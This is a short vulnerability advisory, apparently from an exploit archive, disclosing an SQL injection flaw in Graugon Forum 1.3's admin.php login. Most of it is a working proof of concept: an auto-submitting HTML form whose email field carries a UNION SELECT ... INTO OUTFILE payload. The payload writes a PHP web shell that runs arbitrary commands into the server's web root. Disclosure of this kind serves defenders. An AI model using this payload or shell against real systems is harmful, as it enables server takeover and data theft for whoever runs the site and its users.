Graugon Forum 1.3 SQL Injection Vulnerability

2011-04-06 13:15:11

<!------------------------------------------------------------------------
# Software................Graugon Forum 1.3
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.graugon.com/
# Discovery Date..........4/3/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <[email protected]>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A SQL injection vulnerability in Graugon Forum 1.3 can be exploited to
# extract arbitrary data. In some environments it may be possible to
# create a PHP shell.
#
#
# --PoC-->

<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/forum/admin.php">
<input type="hidden" name="email" value="'and 1=0 UNION SELECT '<?php system($_GET["CMD"]); ?>','','','','','' FROM dual INTO OUTFILE '../../htdocs/shell.php';#" />
<input type="hidden" name="password" value="" />
</form>
</body>
</html>

Fixes

No fixes

In order to submit a new fix you need to be registered.